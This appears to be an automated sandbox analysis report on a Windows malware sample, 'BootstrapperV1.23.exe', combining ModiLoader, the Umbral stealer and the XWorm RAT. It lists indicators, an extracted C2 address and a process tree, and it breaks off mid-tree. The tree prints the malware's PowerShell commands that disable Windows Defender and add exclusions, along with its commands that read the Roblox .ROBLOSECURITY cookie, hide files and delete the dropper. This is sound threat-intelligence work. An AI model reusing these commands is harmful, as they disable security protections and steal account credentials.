modiloader | 073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce

Analysis

max time kernel
135s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
14-11-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootstrapperV1.23.exe
Size

800KB
MD5

7198fa10a50ea9aaf6ae5c2a05af2104
SHA1

c35a2a73313e3c5ad08136e3bc583bb9bc26964c
SHA256

073997d20ef564e271ffb2b4d86773dbf7eddfb7e9f4811b0deb798b4505e2ce
SHA512

56db894671d6b5e093ef2de88ba785f1d9159e2b206593886ad540d336c5dfa79cd5ea7b6b29fbdd39d3a2355bcc01d90f5fff64e97fcbda383e38df79353acf
SSDEEP

12288:naMgC/rJdxLDMVVV/1EIEm6l6O6+26AFxKxg0YZbs7Ql:naMgGfxLDmVwoV+26YcY+0

Score

10^/10

modiloader umbral xworm defense_evasion discovery execution persistence rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

127.0.0.1:26848

23.ip.gl.ply.gg:26848

Attributes

Install_directory
%Userprofile%
install_file
Windows Security Host.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001c00000002aa74-6.dat	family_umbral
behavioral2/memory/2352-25-0x0000025B8B010000-0x0000025B8B050000-memory.dmp	family_umbral

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001c00000002aab9-24.dat	family_xworm
behavioral2/memory/412-29-0x00000000007F0000-0x000000000080A000-memory.dmp	family_xworm

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Modiloader family
modiloader
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

ModiLoader Second Stage 2 IoCs

resource	yara_rule
behavioral2/files/0x001e00000002aae2-1211.dat	modiloader_stage2
behavioral2/memory/3780-1292-0x0000000000400000-0x000000000046A000-memory.dmp	modiloader_stage2

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2088	powershell.exe
3344	powershell.exe
584	powershell.exe
5052	powershell.exe
3148	powershell.exe
2220	powershell.exe
4128	powershell.exe
4540	powershell.exe
5020	powershell.exe
244	powershell.exe
2452	powershell.exe
2368	powershell.exe
2456	powershell.exe
564	powershell.exe
2508	powershell.exe
1732	powershell.exe
1424	powershell.exe
3212	powershell.exe
676	powershell.exe
1864	powershell.exe
2760	powershell.exe
3772	powershell.exe
4476	powershell.exe
2764	powershell.exe
5112	powershell.exe
2204	powershell.exe
2212	powershell.exe
3620	powershell.exe
476	powershell.exe
2100	powershell.exe
3908	powershell.exe
1984	powershell.exe
2728	powershell.exe
1392	powershell.exe
1312	powershell.exe
2096	powershell.exe
3152	powershell.exe
3100	powershell.exe
4996	powershell.exe
4236	powershell.exe
4512	powershell.exe
1868	powershell.exe
1456	powershell.exe
1092	powershell.exe
2160	powershell.exe
4960	powershell.exe
3908	powershell.exe
1020	powershell.exe
3292	powershell.exe
3360	powershell.exe
5036	powershell.exe
980	powershell.exe
4588	powershell.exe
2444	powershell.exe
2060	powershell.exe
1424	powershell.exe
2036	powershell.exe
4768	powershell.exe
4352	powershell.exe
3700	powershell.exe
3200	powershell.exe
4896	powershell.exe
4516	powershell.exe
1980	powershell.exe

Drops file in Drivers directory 16 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Injector.exe

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Security Host.lnk	Windows Security Host.exe

Executes dropped EXE 64 IoCs

pid	Process
2352	Injector.exe
412	Windows Security Host.exe
3844	Injector.exe
4872	Windows Security Host.exe
5008	Injector.exe
656	Windows Security Host.exe
2868	Injector.exe
676	Windows Security Host.exe
2936	Injector.exe
1220	Windows Security Host.exe
2944	Injector.exe
2096	Windows Security Host.exe
3052	Injector.exe
3840	Windows Security Host.exe
2188	Injector.exe
2152	Windows Security Host.exe
2036	Injector.exe
4304	Windows Security Host.exe
3388	Injector.exe
4784	Windows Security Host.exe
2376	Injector.exe
4584	Windows Security Host.exe
3164	Injector.exe
4820	Windows Security Host.exe
2804	Injector.exe
1008	Windows Security Host.exe
476	Injector.exe
1112	Windows Security Host.exe
3168	Injector.exe
1220	Windows Security Host.exe
4412	Injector.exe
2188	Windows Security Host.exe
1664	Injector.exe
3980	Windows Security Host.exe
2400	Injector.exe
4328	Windows Security Host.exe
2916	Injector.exe
3872	Windows Security Host.exe
4916	Injector.exe
4504	Windows Security Host.exe
1848	Injector.exe
1868	Windows Security Host.exe
1856	Injector.exe
2716	Windows Security Host.exe
2676	Injector.exe
3836	Windows Security Host.exe
956	Injector.exe
788	Windows Security Host.exe
4480	Injector.exe
708	Windows Security Host.exe
4728	Injector.exe
4412	Windows Security Host.exe
4776	Injector.exe
4088	Windows Security Host.exe
2184	Injector.exe
4924	Windows Security Host.exe
3048	Injector.exe
776	Windows Security Host.exe
4320	Injector.exe
1784	Windows Security Host.exe
3884	Injector.exe
2796	Windows Security Host.exe
4872	Injector.exe
1448	Windows Security Host.exe

Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs

defense_evasion

Safe Mode Boot

T1562.009

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc	csfemm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power	csfemm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys	csfemm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc	csfemm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager	csfemm.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys	csfemm.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security Host = "C:\\Users\\Admin\\Windows Security Host.exe"	Windows Security Host.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000\Software\Microsoft\Windows\CurrentVersion\Run\csfemm.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\csfemm.exe"	csfemm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 20 IoCs

Web Service

T1102

flow	ioc
1	discord.com
6	discord.com
20	discord.com
25	discord.com
29	discord.com
55	discord.com
67	discord.com
33	discord.com
75	discord.com
15	discord.com
50	discord.com
63	discord.com
79	discord.com
4	discord.com
19	discord.com
37	discord.com
41	discord.com
45	discord.com
59	discord.com
71	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com
19	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csfemm.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 36 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1104	cmd.exe
1140	PING.EXE
1556	cmd.exe
132	cmd.exe
404	PING.EXE
3524	PING.EXE
2592	cmd.exe
3672	PING.EXE
2040	PING.EXE
2752	PING.EXE
1452	cmd.exe
1180	PING.EXE
3320	cmd.exe
3144	cmd.exe
4376	cmd.exe
3416	cmd.exe
4668	cmd.exe
3480	PING.EXE
2344	PING.EXE
2376	cmd.exe
4992	PING.EXE
4360	PING.EXE
2944	PING.EXE
4292	cmd.exe
224	cmd.exe
1448	cmd.exe
3860	PING.EXE
2828	PING.EXE
4796	cmd.exe
4592	cmd.exe
3672	PING.EXE
3840	PING.EXE
4988	PING.EXE
3032	cmd.exe
2804	cmd.exe
2476	PING.EXE

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
4996	timeout.exe

Detects videocard installed 1 TTPs 18 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2580	wmic.exe
4820	wmic.exe
4236	wmic.exe
976	wmic.exe
4928	wmic.exe
3464	wmic.exe
1716	wmic.exe
3980	wmic.exe
3664	wmic.exe
3644	wmic.exe
352	wmic.exe
3204	wmic.exe
4892	wmic.exe
2600	wmic.exe
1240	wmic.exe
4516	wmic.exe
3184	wmic.exe
2636	wmic.exe

Runs ping.exe 1 TTPs 18 IoCs

Remote System Discovery

T1018

pid	Process
2040	PING.EXE
3860	PING.EXE
2344	PING.EXE
2944	PING.EXE
3524	PING.EXE
4988	PING.EXE
4992	PING.EXE
4360	PING.EXE
2828	PING.EXE
2752	PING.EXE
1140	PING.EXE
3672	PING.EXE
3480	PING.EXE
3672	PING.EXE
1180	PING.EXE
404	PING.EXE
3840	PING.EXE
2476	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2352	Injector.exe
2508	powershell.exe
2508	powershell.exe
4896	powershell.exe
4896	powershell.exe
1868	powershell.exe
1868	powershell.exe
2360	powershell.exe
2360	powershell.exe
4476	powershell.exe
4476	powershell.exe
2764	powershell.exe
2764	powershell.exe
1732	powershell.exe
1732	powershell.exe
1392	powershell.exe
1424	powershell.exe
1392	powershell.exe
1424	powershell.exe
412	Windows Security Host.exe
2868	Injector.exe
2220	powershell.exe
2220	powershell.exe
1456	powershell.exe
1456	powershell.exe
1092	powershell.exe
1092	powershell.exe
2060	powershell.exe
2060	powershell.exe
1984	powershell.exe
1984	powershell.exe
3164	Injector.exe
5112	powershell.exe
5112	powershell.exe
4960	powershell.exe
4960	powershell.exe
2728	powershell.exe
2728	powershell.exe
584	powershell.exe
584	powershell.exe
4384	powershell.exe
4384	powershell.exe
3168	Injector.exe
2088	powershell.exe
2088	powershell.exe
2160	powershell.exe
2160	powershell.exe
2036	powershell.exe
2036	powershell.exe
3012	powershell.exe
3012	powershell.exe
4588	powershell.exe
4588	powershell.exe
2400	Injector.exe
2204	powershell.exe
2204	powershell.exe
2444	powershell.exe
2444	powershell.exe
2280	powershell.exe
2280	powershell.exe
348	powershell.exe
348	powershell.exe
3316	powershell.exe
3316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	412	Windows Security Host.exe
Token: SeDebugPrivilege	2352	Injector.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: 36	2848	wmic.exe
Token: SeIncreaseQuotaPrivilege	2848	wmic.exe
Token: SeSecurityPrivilege	2848	wmic.exe
Token: SeTakeOwnershipPrivilege	2848	wmic.exe
Token: SeLoadDriverPrivilege	2848	wmic.exe
Token: SeSystemProfilePrivilege	2848	wmic.exe
Token: SeSystemtimePrivilege	2848	wmic.exe
Token: SeProfSingleProcessPrivilege	2848	wmic.exe
Token: SeIncBasePriorityPrivilege	2848	wmic.exe
Token: SeCreatePagefilePrivilege	2848	wmic.exe
Token: SeBackupPrivilege	2848	wmic.exe
Token: SeRestorePrivilege	2848	wmic.exe
Token: SeShutdownPrivilege	2848	wmic.exe
Token: SeDebugPrivilege	2848	wmic.exe
Token: SeSystemEnvironmentPrivilege	2848	wmic.exe
Token: SeRemoteShutdownPrivilege	2848	wmic.exe
Token: SeUndockPrivilege	2848	wmic.exe
Token: SeManageVolumePrivilege	2848	wmic.exe
Token: 33	2848	wmic.exe
Token: 34	2848	wmic.exe
Token: 35	2848	wmic.exe
Token: 36	2848	wmic.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	4896	powershell.exe
Token: SeDebugPrivilege	4872	Windows Security Host.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4476	powershell.exe
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeIncreaseQuotaPrivilege	3700	wmic.exe
Token: SeSecurityPrivilege	3700	wmic.exe
Token: SeTakeOwnershipPrivilege	3700	wmic.exe
Token: SeLoadDriverPrivilege	3700	wmic.exe
Token: SeSystemProfilePrivilege	3700	wmic.exe
Token: SeSystemtimePrivilege	3700	wmic.exe
Token: SeProfSingleProcessPrivilege	3700	wmic.exe
Token: SeIncBasePriorityPrivilege	3700	wmic.exe
Token: SeCreatePagefilePrivilege	3700	wmic.exe
Token: SeBackupPrivilege	3700	wmic.exe
Token: SeRestorePrivilege	3700	wmic.exe
Token: SeShutdownPrivilege	3700	wmic.exe
Token: SeDebugPrivilege	3700	wmic.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
412	Windows Security Host.exe
404	Windows Security Host.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2932 wrote to memory of 2352	2932	BootstrapperV1.23.exe	81
PID 2932 wrote to memory of 2352	2932	BootstrapperV1.23.exe	81
PID 2932 wrote to memory of 412	2932	BootstrapperV1.23.exe	82
PID 2932 wrote to memory of 412	2932	BootstrapperV1.23.exe	82
PID 2932 wrote to memory of 1072	2932	BootstrapperV1.23.exe	83
PID 2932 wrote to memory of 1072	2932	BootstrapperV1.23.exe	83
PID 2352 wrote to memory of 2848	2352	Injector.exe	84
PID 2352 wrote to memory of 2848	2352	Injector.exe	84
PID 2352 wrote to memory of 1508	2352	Injector.exe	87
PID 2352 wrote to memory of 1508	2352	Injector.exe	87
PID 2352 wrote to memory of 2508	2352	Injector.exe	89
PID 2352 wrote to memory of 2508	2352	Injector.exe	89
PID 2352 wrote to memory of 4896	2352	Injector.exe	91
PID 2352 wrote to memory of 4896	2352	Injector.exe	91
PID 1072 wrote to memory of 3844	1072	BootstrapperV1.23.exe	93
PID 1072 wrote to memory of 3844	1072	BootstrapperV1.23.exe	93
PID 1072 wrote to memory of 4872	1072	BootstrapperV1.23.exe	94
PID 1072 wrote to memory of 4872	1072	BootstrapperV1.23.exe	94
PID 1072 wrote to memory of 2712	1072	BootstrapperV1.23.exe	95
PID 1072 wrote to memory of 2712	1072	BootstrapperV1.23.exe	95
PID 2352 wrote to memory of 1868	2352	Injector.exe	96
PID 2352 wrote to memory of 1868	2352	Injector.exe	96
PID 2352 wrote to memory of 2360	2352	Injector.exe	98
PID 2352 wrote to memory of 2360	2352	Injector.exe	98
PID 412 wrote to memory of 4476	412	Windows Security Host.exe	100
PID 412 wrote to memory of 4476	412	Windows Security Host.exe	100
PID 412 wrote to memory of 2764	412	Windows Security Host.exe	102
PID 412 wrote to memory of 2764	412	Windows Security Host.exe	102
PID 2352 wrote to memory of 3700	2352	Injector.exe	104
PID 2352 wrote to memory of 3700	2352	Injector.exe	104
PID 412 wrote to memory of 1732	412	Windows Security Host.exe	106
PID 412 wrote to memory of 1732	412	Windows Security Host.exe	106
PID 2352 wrote to memory of 3032	2352	Injector.exe	107
PID 2352 wrote to memory of 3032	2352	Injector.exe	107
PID 2352 wrote to memory of 244	2352	Injector.exe	110
PID 2352 wrote to memory of 244	2352	Injector.exe	110
PID 2352 wrote to memory of 1392	2352	Injector.exe	112
PID 2352 wrote to memory of 1392	2352	Injector.exe	112
PID 412 wrote to memory of 1424	412	Windows Security Host.exe	114
PID 412 wrote to memory of 1424	412	Windows Security Host.exe	114
PID 2352 wrote to memory of 2580	2352	Injector.exe	116
PID 2352 wrote to memory of 2580	2352	Injector.exe	116
PID 2712 wrote to memory of 5008	2712	BootstrapperV1.23.exe	118
PID 2712 wrote to memory of 5008	2712	BootstrapperV1.23.exe	118
PID 2712 wrote to memory of 656	2712	BootstrapperV1.23.exe	119
PID 2712 wrote to memory of 656	2712	BootstrapperV1.23.exe	119
PID 2712 wrote to memory of 3492	2712	BootstrapperV1.23.exe	120
PID 2712 wrote to memory of 3492	2712	BootstrapperV1.23.exe	120
PID 2352 wrote to memory of 3416	2352	Injector.exe	121
PID 2352 wrote to memory of 3416	2352	Injector.exe	121
PID 3416 wrote to memory of 2752	3416	cmd.exe	123
PID 3416 wrote to memory of 2752	3416	cmd.exe	123
PID 3492 wrote to memory of 2868	3492	BootstrapperV1.23.exe	124
PID 3492 wrote to memory of 2868	3492	BootstrapperV1.23.exe	124
PID 3492 wrote to memory of 676	3492	BootstrapperV1.23.exe	125
PID 3492 wrote to memory of 676	3492	BootstrapperV1.23.exe	125
PID 3492 wrote to memory of 4016	3492	BootstrapperV1.23.exe	126
PID 3492 wrote to memory of 4016	3492	BootstrapperV1.23.exe	126
PID 2868 wrote to memory of 4360	2868	Injector.exe	127
PID 2868 wrote to memory of 4360	2868	Injector.exe	127
PID 2868 wrote to memory of 3544	2868	Injector.exe	129
PID 2868 wrote to memory of 3544	2868	Injector.exe	129
PID 2868 wrote to memory of 2220	2868	Injector.exe	131
PID 2868 wrote to memory of 2220	2868	Injector.exe	131

Views/modifies file attributes 1 TTPs 19 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5096	attrib.exe
332	attrib.exe
3720	attrib.exe
1508	attrib.exe
3544	attrib.exe
3348	attrib.exe
4360	attrib.exe
3736	attrib.exe
404	attrib.exe
392	attrib.exe
352	attrib.exe
4220	attrib.exe
3396	attrib.exe
4944	attrib.exe
2160	attrib.exe
788	attrib.exe
4464	attrib.exe
4588	attrib.exe
3324	attrib.exe

C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
"C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2932
- C:\Users\Admin\AppData\Local\Temp\Injector.exe
  "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2352
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2848
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Views/modifies file attributes
    PID:1508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4896
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2360
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3700
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:3032
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1392
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2580
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Injector.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2752
- C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4476
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1732
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD656.tmp.bat""
    3⤵
    PID:1500
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4996
- C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
  "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1072
- - C:\Users\Admin\AppData\Local\Temp\Injector.exe
    "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
    3⤵
    - Executes dropped EXE
    PID:3844
- - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4872
- - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
    "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2712
  - - C:\Users\Admin\AppData\Local\Temp\Injector.exe
      "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
      4⤵
      Executes dropped EXE
      PID:5008
  - - C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe
      "C:\Users\Admin\AppData\Local\Temp\Windows Security Host.exe"
      4⤵
      Executes dropped EXE
      PID:656
  - - C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe
      "C:\Users\Admin\AppData\Local\Temp\BootstrapperV1.23.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3492
    - - C:\Users\Admin\AppData\Local\Temp\Injector.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2868
      - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        6⤵
        
        PID:4360
      - C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Injector.exe"
        6⤵
        Views/modifies file attributes
        
        PID:3544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Injector.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2220
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1456
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        6⤵
